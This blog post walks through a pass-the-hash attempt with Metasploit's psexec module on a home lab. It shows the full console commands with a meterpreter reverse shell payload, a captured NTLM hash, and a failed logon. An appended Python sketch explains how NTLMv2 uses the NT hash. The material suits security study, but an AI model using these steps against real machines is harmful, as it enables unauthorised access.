
Metasploit: Pass the Hash – windows/smb/psexec


Probably my favourite blog title so far.

Following on from the Hashdump post in which I obtained the Windows passwords in the form of hashes and then decrypted them for the password, the following uses the hashes to log in without the need for decryption:

msf > use windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(psexec) > set SMBPass 120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6
SMBPass => 120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.70:443
[*] Connecting to the server...
[*] Authenticating to 192.168.1.79:445|WORKGROUP as user ''...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

As you can see, this completely failed, which did not take me by surprise since every time I have attempted to use the SMB command against this Windows system, it has failed.

No idea why.
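Why a hash can stand in for the password at all, as an added example that is not code from the original post: in NTLMv2 the client and the server both derive the response key from the NT hash, so the cleartext password never enters the exchange. The NT hash is the second half of the SMBPass value above and WORKGROUP comes from the console output; the user name, the challenge and the simplified blob are constructed assumptions.

```python
import hashlib
import hmac

def response_key(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 response key: HMAC-MD5 keyed with the NT hash over UPPER(user)+domain."""
    identity = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, identity, hashlib.md5).digest()

def client_response(nt_hash, user, domain, challenge, blob):
    """What a client sends: a 16-byte proof followed by the blob it covers."""
    key = response_key(nt_hash, user, domain)
    proof = hmac.new(key, challenge + blob, hashlib.md5).digest()
    return proof + blob

def server_verify(stored_nt_hash, user, domain, challenge, response):
    """The server recomputes the proof from the NT hash it stores."""
    proof, blob = response[:16], response[16:]
    key = response_key(stored_nt_hash, user, domain)
    expected = hmac.new(key, challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)

# NT hash: second half of the SMBPass value shown in the post.
NT_HASH = bytes.fromhex("e653e6452753c97e46792567dff599b6")
USER, DOMAIN = "Administrator", "WORKGROUP"    # user name is constructed
CHALLENGE = bytes.fromhex("0123456789abcdef")  # constructed server challenge
BLOB = b"constructed-client-blob"              # simplified; real blobs carry timestamp, nonce, target info

def demo():
    good = client_response(NT_HASH, USER, DOMAIN, CHALLENGE, BLOB)
    wrong = client_response(bytes(16), USER, DOMAIN, CHALLENGE, BLOB)
    # A response bound to one challenge does not verify against a fresh one.
    stale = server_verify(NT_HASH, USER, DOMAIN, bytes(8), good)
    return (server_verify(NT_HASH, USER, DOMAIN, CHALLENGE, good),
            server_verify(NT_HASH, USER, DOMAIN, CHALLENGE, wrong),
            stale)

if __name__ == "__main__":
    print(demo())
```

Since the stored hash is the only secret in the computation, it has to be protected like the password itself.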

